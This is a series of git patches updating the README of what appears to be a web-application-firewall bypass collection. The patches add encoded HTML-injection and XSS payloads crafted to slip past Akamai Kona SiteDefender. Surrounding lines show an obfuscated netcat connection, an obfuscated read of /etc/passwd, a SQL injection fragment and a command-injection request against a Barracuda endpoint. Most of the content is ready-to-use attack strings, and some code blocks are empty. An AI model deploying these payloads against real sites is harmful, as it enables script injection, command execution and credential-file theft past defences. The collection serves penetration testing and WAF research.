From afee7a1bc720b5c602a741255cd4000c08baf8cd Mon Sep 17 00:00:00 2001 From: Infected Drake Date: Mon, 3 Jun 2019 12:29:07 +0530 Subject: [PATCH 1/3] Updated bruises with more Kona WAF bypasses --- README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/README.md b/README.md index 146d256..acb87b1 100644 --- a/README.md +++ b/README.md @@ -2971,6 +2971,10 @@ stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS - [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991) ### Kona SiteDefender +- HTML Injection by [@sp1d3rs](https://twitter.com/h1_sp1d3rs) +``` +%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E +``` - XSS Bypass by [@zseano](https://twitter.com/zseano) ``` ?"> @@ -2979,6 +2983,10 @@ stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS ``` ``` +- [XSS Bypass](https://hackerone.com/reports/263226) by [@sp1d3rs](https://twitter.com/h1_sp1d3rs) +``` +%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E +``` ### Profense - [GET Type CSRF Attack](https://www.exploit-db.com/exploits/7919) by [@Michael Brooks](https://www.exploit-db.com/?author=628) (>= v.2.6.2) From d8e1ddffa520efc92f99c58708cfc3541ede487f Mon Sep 17 00:00:00 2001 From: Infected Drake Date: Mon, 3 Jun 2019 13:01:03 +0530 Subject: [PATCH 2/3] More bypasses for Akamai WAF --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index acb87b1..f024f94 100644 --- a/README.md +++ b/README.md @@ -2971,11 +2971,15 @@ stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS - [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991) ### Kona SiteDefender -- HTML Injection by [@sp1d3rs](https://twitter.com/h1_sp1d3rs) +- [HTML Injection](https://hackerone.com/reports/263226) by [@sp1d3rs](https://twitter.com/h1_sp1d3rs) ``` %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E ``` -- XSS Bypass by [@zseano](https://twitter.com/zseano) +- [XSS Bypass](https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c) by [@Jonathan Bouman](https://twitter.com/jonathanbouman) +``` + ``` From f111d0479cab34ef0437c30327ea87c23f2fd0da Mon Sep 17 00:00:00 2001 From: Infected Drake Date: Mon, 3 Jun 2019 13:18:59 +0530 Subject: [PATCH 3/3] Small perky update to stuff --- README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index f024f94..b3a924a 100644 --- a/README.md +++ b/README.md @@ -2349,7 +2349,7 @@ __Standard__: `/bin/nc 127.0.0.1 1337` __Obfuscated__: `/???/n? 2130706433 1337` Used chars: `/ ? n [0-9]` -__9. String Concatenation__ +__9. Dynamic Payload Generation__ - Different programming languages have different syntaxes and patterns for concatenation. - This allows us to effectively generate payloads that can bypass many filters and rules. @@ -2363,7 +2363,7 @@ __Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd` __Standard__: `` __Obfuscated__: ``` - + ``` __13. Obfuscation in Other Formats__ @@ -2694,7 +2694,7 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) ``` -- XSS Bypass by [0xInfection](https://twitter.com/0xInfection) +- XSS Bypass by [@0xInfection](https://twitter.com/0xInfection) ``` clickhere ```